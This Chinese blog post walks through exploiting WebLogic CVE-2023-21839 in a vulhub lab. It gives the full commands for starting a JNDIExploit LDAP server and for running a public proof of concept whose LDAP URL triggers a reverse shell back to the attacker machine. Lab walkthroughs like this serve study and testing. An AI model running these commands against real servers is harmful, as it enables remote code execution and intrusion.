weblogic CVE-2023-21839详细复现

1、本次复现使用vulhub的靶场

切换到靶场的目录下,用docker -compose up -d启动靶场

使用docker-compose ps -a查看靶场的端口

2、访问开启的环境

3、准备工作都做好之后开始复现

(1)开启JNDIExploit

工具地址:GitHub - WhiteHSBG/JNDIExploit: 对原版https://github.com/feihong-cs/JNDIExploit 进行了实用化修改

使用工具JNDIExploit-1.3-SNAPSHOT.jar在kali上设置监听,开启ldap和http服务,这里我kali攻击机的java版本是java11

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.10.130(ip地址为攻击机的ip地址)

(2)监听端口(用于接收反弹的shell)

(3)使用工具包

这里我使用的是这个:GitHub - ASkyeye/CVE-2023-21839: Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

需要用go语言编译一下,kali安装go语言环境可以csdn上查到

编译之后运行下面的命令:./CVE-2023-21839 -ip 192.168.10.133 -port 7001 -ldap ldap://192.168.10.130:1389/Basic/ReverseShell/192.168.10.130/9999,第一个ip是靶机的ip地址,第二个ip是攻击机kali的ip

(4)查看监听的端口

成功复现,记得关闭docker启动的镜像

关闭镜像

关闭容器

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-03-15 20:50:04       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-15 20:50:04       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-03-15 20:50:04       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-03-15 20:50:04       18 阅读

热门阅读

  1. Linux磁盘管理

    2024-03-15 20:50:04       16 阅读
  2. RK3568 Ubuntu解决无法制作SD卡的问题

    2024-03-15 20:50:04       17 阅读
  3. 【vue回调函数中的 this 指向上】

    2024-03-15 20:50:04       15 阅读
  4. C++ 预编译头文件

    2024-03-15 20:50:04       21 阅读
  5. Excel百万数据如何导入导出

    2024-03-15 20:50:04       19 阅读
  6. 将PostgreSQL插件移植到openGauss指导

    2024-03-15 20:50:04       18 阅读
  7. 【TypeScript】快速掌握TypeScript的基本语法

    2024-03-15 20:50:04       19 阅读